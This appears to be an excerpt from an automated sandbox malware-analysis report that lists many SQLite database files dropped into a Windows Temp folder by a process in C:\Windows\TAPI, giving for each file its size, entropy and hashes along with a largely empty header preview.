                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\vgGsGUT1bP

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):159744
                                                                                                                                                                        Entropy (8bit):0.7873599747470391
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                        MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                        SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                        SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                        SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\vhc6TzHo0M

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\wLcFEoU5tR

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\walAhnUUaA

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\wfuH9wplL6

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.5712781801655107
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\whwUOq7TxM

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):159744
                                                                                                                                                                        Entropy (8bit):0.7873599747470391
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                        MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                        SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                        SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                        SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\wjiIWOsqVv

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\woQKxsC7UW

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):28672
                                                                                                                                                                        Entropy (8bit):2.5793180405395284
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\x5JOI0ACxc

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\x9vGUyrBXG

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):49152
                                                                                                                                                                        Entropy (8bit):0.8180424350137764
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\xNwkBPQoJY

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):28672
                                                                                                                                                                        Entropy (8bit):2.5793180405395284
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\xVYXlRaobL

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\xVasebWgWN

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\xWUorsdwxj

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\xj5UVXCoQC

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):49152
                                                                                                                                                                        Entropy (8bit):0.8180424350137764
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\xkhvs7s84F

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\xotMZY7Laq

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\ySQF7nQAph

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\yha6N5ESkn

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.5707520969659783
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\z9f1OFTytt

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                        Malicious:false
